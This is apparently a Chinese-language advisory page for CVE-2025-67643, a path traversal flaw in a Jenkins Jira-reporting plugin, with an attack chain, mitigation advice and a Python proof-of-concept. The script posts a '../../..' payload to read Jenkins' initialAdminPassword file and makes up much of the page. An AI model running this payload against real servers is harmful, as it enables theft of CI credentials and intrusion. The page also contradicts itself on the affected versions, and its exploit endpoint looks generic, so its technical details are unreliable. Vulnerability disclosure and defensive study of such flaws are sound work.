CVE-2025-67643: Jenkins Redpen插件路径遍历漏洞允许读取任意文件

漏洞信息

漏洞编号

CVE-2025-67643

漏洞类型

路径遍历

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins Redpen - Pipeline Reporter for Jira Plugin

漏洞概述

CVE-2025-67643是Jenkins Redpen - Pipeline Reporter for Jira Plugin中的一个路径遍历安全漏洞。该漏洞存在于插件1.054.v7b_9517b_6b_202及更早版本中，源于在将工件上传到Jira时，插件未能正确验证工作区目录的路径。攻击者如果拥有Item/Configure权限，可以通过构造特殊的文件路径，利用此漏洞检索Jenkins控制器工作区目录中的敏感文件，包括配置文件、凭据、源代码和其他机密数据。此漏洞的CVSS评分为4.3，属于中等严重程度，主要影响机密性。由于攻击复杂度较低且无需用户交互，具有相关权限的恶意用户可以轻松利用此漏洞进行横向移动和数据窃取，对组织的安全构成实质性威胁。

技术细节

该漏洞的根本原因在于路径验证逻辑不完善。在Jenkins Redpen插件处理文件上传的过程中，插件接受用户提供的文件路径但未进行充分的路径规范化检查。攻击者可以利用路径遍历技术（如使用../等相对路径序列）来绕过基本的安全检查，访问Jenkins控制器工作区目录之外的敏感文件。具体来说，当插件执行文件上传操作时，它直接使用用户输入的文件路径而没有验证最终解析的绝对路径是否位于允许的工作区内。这允许攻击者通过构造类似../../../etc/passwd或../../../var/jenkins_home/secrets/initialAdminPassword的路径来读取系统敏感文件。由于Jenkins控制器通常具有较高的系统权限，此漏洞可能被利用来获取Jenkins凭据、API密钥、构建脚本以及其他部署相关的敏感信息，进而对整个CI/CD管道造成严重影响。

攻击链分析

STEP 1

步骤1

攻击者获取Jenkins账户并获得Item/Configure权限

STEP 2

步骤2

攻击者访问Jenkins Redpen插件的文件上传功能

STEP 3

步骤3

攻击者构造包含路径遍历序列（如../../..）的恶意文件路径请求

STEP 4

步骤4

插件未正确验证路径，直接使用攻击者提供的路径读取文件

STEP 5

步骤5

攻击者成功获取Jenkins控制器工作区外的敏感文件内容

STEP 6

步骤6

攻击者利用获取的凭据或密钥进行横向移动，进一步入侵系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67643 PoC - Path Traversal in Jenkins Redpen Plugin
# This PoC demonstrates how an attacker with Item/Configure permission
# can read arbitrary files from Jenkins controller workspace

import requests
import json

JENKINS_URL = "http://target-jenkins-server:8080"
TARGET_PLUGIN = "/redpen-jira/uploadArtifact"

# Authentication with Item/Configure permission
AUTH_TOKEN = "base64_encoded_user:api_token"

def exploit_path_traversal():
    """
    Exploit the path traversal vulnerability to read sensitive files
    """
    headers = {
        "Authorization": f"Basic {AUTH_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Path traversal payload to read Jenkins credentials
    traversal_path = "../../../../var/jenkins_home/secrets/initialAdminPassword"
    
    payload = {
        "artifactPath": traversal_path,
        "jobName": "vulnerable-job",
        "buildNumber": 1
    }
    
    try:
        response = requests.post(
            f"{JENKINS_URL}{TARGET_PLUGIN}",
            headers=headers,
            json=payload,
            timeout=30
        )
        
        if response.status_code == 200:
            print("[+] Successfully exploited path traversal vulnerability")
            print(f"[+] Retrieved content: {response.text}")
            return response.text
        else:
            print(f"[-] Exploitation failed: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None

def check_plugin_version():
    """
    Check if target is running vulnerable version
    """
    # Query Jenkins plugin manager API
    pass

if __name__ == "__main__":
    print("CVE-2025-67643 Path Traversal Exploitation")
    print("Target: Jenkins Redpen - Pipeline Reporter for Jira Plugin")
    exploit_path_traversal()

影响范围

Jenkins Redpen - Pipeline Reporter for Jira Plugin < 1.054.v7b_9517b_6b_202

防御指南

临时缓解措施

立即升级Jenkins Redpen - Pipeline Reporter for Jira Plugin到修复版本。如果无法立即升级，可以通过Jenkins安全管理界面限制或禁用该插件，同时审查具有Item/Configure权限的用户列表，确保只有可信用户拥有该权限。此外，建议配置网络隔离，限制Jenkins控制器对敏感目录的访问权限，并启用详细的审计日志以便及时发现潜在的攻击行为。